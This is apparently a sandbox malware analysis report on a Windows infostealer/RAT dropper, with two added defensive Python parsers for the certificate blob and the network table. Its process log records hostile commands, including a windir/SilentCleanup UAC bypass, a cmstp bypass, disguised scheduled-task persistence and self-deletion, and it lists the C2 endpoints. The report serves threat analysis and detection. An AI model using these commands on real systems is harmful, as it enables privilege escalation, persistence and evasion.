Analysis Overview
SHA256: 959e3ca2579b6be8a11c06763c5a34ec118abc96d869e25bef06319c92da465e
Threat Level: Known bad
The file ED4D2E0F901BC478BE16D3DAD0D02792.exe was found to be: Known bad.
Malicious Activity Summary
Azorult
Raccoon Stealer Payload
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M3
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
Modifies Windows Defender Real-time Protection settings
Raccoon
Remcos
Contains code to disable Windows Defender
Oski
AsyncRat
Async RAT payload
Executes dropped EXE
Downloads MZ/PE file
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Deletes itself
Windows security modification
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Kills process with taskkill
Suspicious behavior: MapViewOfSection
Delays execution with timeout.exe
Checks processor information in registry
Suspicious use of WriteProcessMemory
Modifies system certificate store
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported: 2021-08-13 11:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2021-08-13 11:33
Reported: 2021-08-13 11:36
Platform: win7v20210408
Max time kernel: 152s
Max time network: 155s
Command Line
Signatures
AsyncRat
Azorult
Contains code to disable Windows Defender
Modifies Windows Defender Real-time Protection settings
Oski
Raccoon
Raccoon Stealer Payload
Remcos
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M3
Async RAT payload
Downloads MZ/PE file
Executes dropped EXE
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" | C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" | C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
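A caveat on the "Modifies system certificate store" hit above: the key name DAC9024F54D8F6DF94935FB1732638CA6AD77C13 is the SHA-1 thumbprint of the public root "DST Root CA X3", and that friendly name is readable inside the blob as UTF-16LE (the 440053005400... run). An AuthRoot entry with a well-known public root is what Windows 7 writes when its on-demand root update pulls a trusted CA during a TLS handshake; the ocsp.verisign.com and www.microsoft.com lookups in the Network section and the CryptnetUrlCache files under Files are the same mechanism. So this row is an OS side effect of the sample's network activity, not the sample planting its own CA. The entry is still worth parsing rather than eyeballing, because an attacker-installed root would show up in exactly this format with a name and thumbprint nobody recognises. The parser below is an added example, not part of the report or of any vendor tooling. It implements the serialized property format Windows uses for these Blob values (DWORD property id, DWORD reserved = 1, DWORD length, data), decodes the friendly name, and checks that the stored SHA-1 property matches the hash of the embedded DER certificate. The sample data is the first eight property records of the blob above copied verbatim plus the header of the certificate record with only its first 8 bytes, which exercises the truncation path; the "Demo Root" blob is constructed for the example and contains no real certificate.

```python
"""Parse and sanity-check a Windows serialized certificate 'Blob' registry value.

Record format, repeated once per certificate property (little-endian):
    DWORD propid | DWORD reserved (always 1) | DWORD cb | BYTE data[cb]
"""
from __future__ import annotations

import hashlib
import struct

CERT_SHA1_HASH_PROP_ID = 0x03      # thumbprint; the registry key is named after it
CERT_MD5_HASH_PROP_ID = 0x04
CERT_ENHKEY_USAGE_PROP_ID = 0x09   # DER SEQUENCE of EKU OIDs
CERT_FRIENDLY_NAME_PROP_ID = 0x0B  # NUL-terminated UTF-16LE string
CERT_KEY_IDENTIFIER_PROP_ID = 0x14
CERT_CERT_PROP_ID = 0x20           # the DER-encoded certificate itself


def parse_cert_blob(blob: bytes) -> tuple[dict[int, bytes], int | None]:
    """Return (complete properties, id of the property cut off by truncation or None)."""
    props: dict[int, bytes] = {}
    off = 0
    while off + 12 <= len(blob):
        propid, reserved, cb = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError(f"bad reserved field {reserved:#x} at offset {off + 4}")
        off += 12
        if off + cb > len(blob):
            return props, propid          # declared length runs past the end of the value
        props[propid] = blob[off:off + cb]
        off += cb
    if off != len(blob):
        raise ValueError(f"{len(blob) - off} trailing bytes do not form a record header")
    return props, None


def summarize(blob: bytes) -> dict:
    """Readable view of a blob plus a thumbprint check (None when the cert is incomplete)."""
    props, truncated_prop = parse_cert_blob(blob)
    out = {"truncated_prop": truncated_prop, "thumbprint_verified": None,
           "property_ids": sorted(props)}
    if CERT_FRIENDLY_NAME_PROP_ID in props:
        out["friendly_name"] = props[CERT_FRIENDLY_NAME_PROP_ID].decode("utf-16-le").rstrip("\x00")
    if CERT_SHA1_HASH_PROP_ID in props:
        out["sha1"] = props[CERT_SHA1_HASH_PROP_ID].hex().upper()
    if CERT_CERT_PROP_ID in props and "sha1" in out:
        # The key name and property 3 must both equal SHA-1(DER); a mismatch means the
        # value was edited by something other than CryptoAPI.
        der = props[CERT_CERT_PROP_ID]
        out["thumbprint_verified"] = hashlib.sha1(der).hexdigest().upper() == out["sha1"]
    return out


def build_cert_blob(der: bytes, friendly_name: str) -> bytes:
    """Serialize a blob in the same record format (used here only to build test data)."""
    def rec(propid: int, data: bytes) -> bytes:
        return struct.pack("<III", propid, 1, len(data)) + data
    return (rec(CERT_FRIENDLY_NAME_PROP_ID, (friendly_name + "\x00").encode("utf-16-le"))
            + rec(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(der).digest())
            + rec(CERT_CERT_PROP_ID, der))


# First eight property records of the Blob value in the report, copied verbatim, then
# the header of the certificate record (id 0x20, 0x34e bytes) and just its first 8
# bytes: enough to show the truncation path without 1.7 KB of hex.
REPORT_BLOB_PREFIX = bytes.fromhex(
    "040000000100000010000000410352dc0ff7501b16f0028eba6f45c5"
    "0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d"
    "0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000"
    "090000000100000016000000301406082b0601050507030406082b06010505070301"
    "140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910"
    "1d00000001000000100000004558d512eecb27464920897de7b66053"
    "030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c13"
    "1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424"
    "20000000010000004e030000" "3082034a30820232"
)

# Constructed blob: not a real certificate, just bytes whose SHA-1 we control.
DEMO_DER = b"not a real certificate, constructed for the example"
DEMO_BLOB = build_cert_blob(DEMO_DER, "Demo Root")
# Same blob with the last byte of the 'certificate' flipped: thumbprint no longer matches.
TAMPERED_BLOB = DEMO_BLOB[:-1] + bytes([DEMO_BLOB[-1] ^ 0x01])

if __name__ == "__main__":
    for label, blob in (("report", REPORT_BLOB_PREFIX), ("demo", DEMO_BLOB), ("tampered", TAMPERED_BLOB)):
        print(label, summarize(blob))
```

On a live host the same check can be run over every subkey of SystemCertificates\ROOT and \AuthRoot in HKLM and HKCU; a friendly name you do not recognise, a thumbprint that does not match the embedded certificate, or a key whose name differs from property 3 is the signal to look at, whereas a well-known public root under AuthRoot is the auto-update doing its job.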
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"
C:\ProgramData\GFDyrtucbvfdg.exe
"C:\ProgramData\GFDyrtucbvfdg.exe"
C:\ProgramData\GFDyrtucbvfdg.exe
"C:\ProgramData\GFDyrtucbvfdg.exe"
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"
C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"
C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
"C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe"
C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
"C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe"
C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
"C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 756 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\458908152343698\\* & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 756
C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
"C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe"
C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
"C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
"C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe"
C:\Windows\SysWOW64\logagent.exe
C:\Windows\System32\logagent.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Public\Trast.bat" "
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Public\nest.bat" "
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
"{path}"
C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
"{path}"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3A90.tmp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\udz2b2rb.inf
C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
"{path}"
C:\Windows\system32\taskeng.exe
taskeng.exe {E6E87F1B-80A7-427B-A640-09E5F00EB9D9} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | telete.in | udp |
| N/A | 195.201.225.248:443 | telete.in | tcp |
| N/A | 45.67.231.40:80 | 45.67.231.40 | tcp |
| N/A | 8.8.8.8:53 | danielmi.ac.ug | udp |
| N/A | 185.215.113.77:80 | danielmi.ac.ug | tcp |
| N/A | 8.8.8.8:53 | danielmax.ac.ug | udp |
| N/A | 185.215.113.77:80 | danielmax.ac.ug | tcp |
| N/A | 185.215.113.77:80 | danielmax.ac.ug | tcp |
| N/A | 8.8.8.8:53 | cdn.discordapp.com | udp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | sergio.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | icando.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | www.microsoft.com | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | icacxndo.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ocsp.verisign.com | udp |
| N/A | 23.51.123.27:80 | ocsp.verisign.com | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
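A quick way to read the Network table is to separate what the sample resolved from what it actually talked to. Several names (ramosasdj, parhatcsafxz, heartdoaz and aertdfvaz under ac.ug, plus icando.ug) were only looked up and never connected to, which for a Remcos or AsyncRAT build is consistent with a fallback C2 list whose entries were not live at detonation time; the TCP sessions on 79.134.225.25:6969 and 194.5.98.107:6970 are the non-HTTP RAT channels, and 45.67.231.40:80 is reached by IP literal with no DNS at all. The script below is an added example, not part of the report; it parses a subset of the rows above (copied as shown, repeats kept) and derives exactly those three views. Treating 53, 80 and 443 as the "standard" port set is a choice made for this example.

```python
"""Split the sandbox Network table into resolved-only names, live endpoints and odd ports."""
from collections import Counter

# Rows copied from the Network table above (a representative subset, repeats kept).
NETWORK_TABLE = """
| N/A | 8.8.8.8:53 | telete.in | udp |
| N/A | 195.201.225.248:443 | telete.in | tcp |
| N/A | 45.67.231.40:80 | 45.67.231.40 | tcp |
| N/A | 8.8.8.8:53 | danielmi.ac.ug | udp |
| N/A | 185.215.113.77:80 | danielmi.ac.ug | tcp |
| N/A | 8.8.8.8:53 | danielmax.ac.ug | udp |
| N/A | 185.215.113.77:80 | danielmax.ac.ug | tcp |
| N/A | 185.215.113.77:80 | danielmax.ac.ug | tcp |
| N/A | 8.8.8.8:53 | cdn.discordapp.com | udp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | sergio.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | icando.ug | udp |
| N/A | 8.8.8.8:53 | www.microsoft.com | udp |
| N/A | 8.8.8.8:53 | icacxndo.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ocsp.verisign.com | udp |
| N/A | 23.51.123.27:80 | ocsp.verisign.com | tcp |
"""

STANDARD_PORTS = {53, 80, 443}  # choice made for this example


def parse_rows(table: str):
    """Return (ip, port, domain, proto) per data row; header and blank lines are skipped."""
    rows = []
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        _country, dest, domain, proto = cells
        ip, _, port = dest.rpartition(":")
        rows.append((ip, int(port), domain, proto.lower()))
    return rows


def triage(rows):
    """Three views: names resolved but never contacted, TCP endpoints with hit counts,
    endpoints on non-standard ports, and connections made straight to an IP literal."""
    resolved = {d for ip, port, d, proto in rows if proto == "udp" and port == 53}
    connected = Counter((d, ip, port) for ip, port, d, proto in rows if proto == "tcp")
    contacted_names = {d for d, _, _ in connected}
    return {
        "dns_only": sorted(resolved - contacted_names),
        "endpoints": dict(connected),
        "nonstandard_port": sorted(f"{ip}:{port}" for d, ip, port in connected
                                   if port not in STANDARD_PORTS),
        "direct_ip": sorted(f"{ip}:{port}" for d, ip, port in connected if d == ip),
    }


if __name__ == "__main__":
    for view, value in triage(parse_rows(NETWORK_TABLE)).items():
        print(view, value)
```

Note that www.microsoft.com also lands in the resolved-only set: the Windows root-update check makes the lookup but the report shows no session, so a DNS-only name is a lead to confirm against the process that issued it, not a verdict on its own.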
Files
memory/684-62-0x0000000075C71000-0x0000000075C73000-memory.dmp
\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/2016-65-0x0000000000000000-mapping.dmp
\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/2044-72-0x000000000041A684-mapping.dmp
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/684-74-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2016-76-0x00000000003C0000-0x00000000003C8000-memory.dmp
memory/2016-75-0x0000000000240000-0x0000000000241000-memory.dmp
memory/2044-77-0x0000000000400000-0x0000000000420000-memory.dmp
\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
memory/2040-80-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
